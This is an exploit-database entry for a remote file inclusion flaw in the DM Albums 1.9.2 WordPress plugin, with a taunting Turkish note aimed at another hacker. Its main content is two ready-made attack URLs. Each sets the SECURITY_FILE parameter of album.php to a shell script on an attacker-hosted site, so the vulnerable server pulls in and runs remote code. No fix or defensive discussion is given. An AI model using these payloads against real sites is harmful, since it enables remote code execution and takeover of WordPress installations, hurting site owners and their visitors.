id: 5432
date: 06/28/2009
title: WordPress Plugin DM Albums 1.9.2 Remote File Inclusion Vuln
author: Septemb0x
cves: 

===========================================================
WordPress Plugin DM Albums 1.9.2 Remote File Inclusion Vuln
===========================================================


#############################################################################################
[+] DM Albums™ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability
[+] Author : Septemb0x
[+] Dork : Yok Dork Mork :D
[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
#############################################################################################
[+] NORMAL EXPLOIT;
[+] http://[sitename]/[path]/template/album.php?SECURITY_FILE=http://attackersite/shell.php
[+] WORDPRESS EXPLOIT
[+] http://[sitename]/[path]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
#############################################################################################
< ---- Note ---- >
H....R;
Sen cok ustun zekaya sahip birisin,
emin olbilirsin, :D
Sql injection ile domain hackleyebilen tek lamersin, :D
ASP'de Rfi Bulmakta Birebirsin,
Ama Gordugum En h?yar Lamersin :D
Bu Kafiyelerde Bi Taraf?na Girsin ;)
Lol H....R :D
< ---- Note Finished ---- >



#  0day.today [2023-03-23]  #